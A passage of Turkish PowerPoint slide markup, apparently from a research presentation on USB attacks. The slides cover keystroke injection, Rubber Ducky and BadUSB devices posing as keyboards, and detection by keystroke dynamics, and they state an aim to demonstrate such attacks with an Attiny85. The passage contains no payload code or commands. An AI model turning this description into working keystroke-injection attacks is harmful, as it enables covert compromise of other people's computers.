        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>Bireyler ve kuruluşların çalışanları, USB cihazlarını günlük kullanım için güvenilir ve güvenilir araçlar olarak görmektedir. Yıllar içinde saldırganlar, bu cihazların güvenlik açıklarından, özelliklerinden ve yeteneklerinden yararlanarak çeşitli siber saldırılar başlatmak için USB çevre birimlerini kullandılar. Saldırıların çoğu kuruluşlara yöneliktir ve saldırıyı gerçekleştirmek için sosyal mühendislik kullanılmıştır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t> Saldırganlar, insan davranışındaki güvenlik açıklarından yararlanmak ve bir kuruluşa kötü amaçlı yazılım sızmak veya kuruluştan gizli verileri sızdırmak için sosyal mühendisliği kullanır; bu nedenle, sosyal mühendislik artık kuruluşların uğraşması gereken önemli bir güvenlik tehdidi oluşturmaktadır. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2" descr="SUTUKSNET (STUXNET) NEDİR? —– ALINTIDIR | Abdullah Işık Kişisel Blog Sayfası">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1257FB3-91F5-4E95-9679-1FF642F96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585" y="1309458"/>
            <a:ext cx="3293621" cy="2119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NSA Ant Catalog - USB">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA939188-3DCC-4F0F-8097-48E543F4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270" y="3742799"/>
            <a:ext cx="2186930" cy="28294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27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A51-B735-463E-93C5-E1DCA8F234D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F13F306B-6255-4D2A-831E-CF6923EFFA96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913795" y="2096063"/>
            <a:ext cx="4614938" cy="4414803"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>Bir USB saldırısı örneği olarak  Tuş Vuruşu enjeksiyonlarına bakıldığında, bir klavyeyi taklit ederek kurbanın ana bilgisayarına kötü amaçlı komutlar enjekte etmeyi ve böylece saldırganın gizli hedeflerine - bu gibi durumlarda bilgisayar - ulaşmayı amaçlayan kötü niyetli bir USB cihazı (kötü niyetli bir mikro denetleyici içerir) klavyenin üretici tarafından üretilmediğini belirleyemez; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1"/>
              <a:t>Rubber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1"/>
              <a:t>Ducky</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t> saldırısı da dahil olmak üzere bu tür birçok saldırı zaten uygulandı. Bu saldırılar, genel olarak insan dışı kalıpları ve özel olarak belirli kullanıcıları tanımlamak için tuş vuruşlarının özelliklerini ve dinamiklerini analiz eden mevcut algılama mekanizmalarıyla tespit edilebilir. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>Kötü niyetli USB aygıtı, insanın tuş vuruş dinamikleriyle birlikte kötü niyetli tuş vuruşlarını otomatik olarak enjekte ederse, ancak tipik bir klavye gibi görünür ve hareket eder ve kurcalanma belirtisi göstermezse, algılama daha zor hale gelebilir. USB cihazlarının yaygın kullanımı ve bu cihazlara duyulan güven düşünüldüğünde, bu tür bir saldırının zarar verme potansiyeli büyüktür.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Duck Hunt: Memory forensics of USB attack platforms - ScienceDirect">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74B30140-9EC8-40BF-AF9D-251066B96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838" y="2189956"/>
            <a:ext cx="5210175" cy="31718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2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21D869E-1D8D-4D01-A268-64945D64FD7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="sr-Latn-CS" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Amaç</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" dirty="0">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AE35B1E-AEE8-47EC-AC32-A2D8F8898AC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516737" y="1935921"/>
            <a:ext cx="6595708" cy="3695136"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>araştırmanın</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>amacı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>temel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aygıtlarıyla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yapılabilecek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırıların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>potansiyelini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>incelemektir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Programlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>USB'nin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>İnsan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Arayüz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Aygıtını</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>taklit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>edebileceği</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>şekilde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yazıldığında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>gerçek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aygıt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ile</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kod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>arasında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ayrım</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yapmak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>zordur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>nedenle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırılar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>insanların</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bilgisayarlarındaki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>komutları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>onlar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>farkında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olmadan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>çalıştırma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>güveninden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saflığından</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yararlanmayı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>amaçlamaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Özellikle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tuş</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>vuruşu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırılarının</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>tüm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>BadUSB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kavramında</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>temel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>oluşturduğu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>aynı</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>zamanda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>bu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kavramları</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>daha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>iyi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>öğrenebilmek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>için</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>erişilebilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>araç</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>olarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kabul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>edebileceğimiz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> Attiny85 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>kullanılan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>komut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>dosyalarıyla</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>yapılabilecek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>saldırılara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>örnek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>verecek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>etmeye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>odaklanacağız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>Ayrıca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>temel</a:t>
            </a:r>
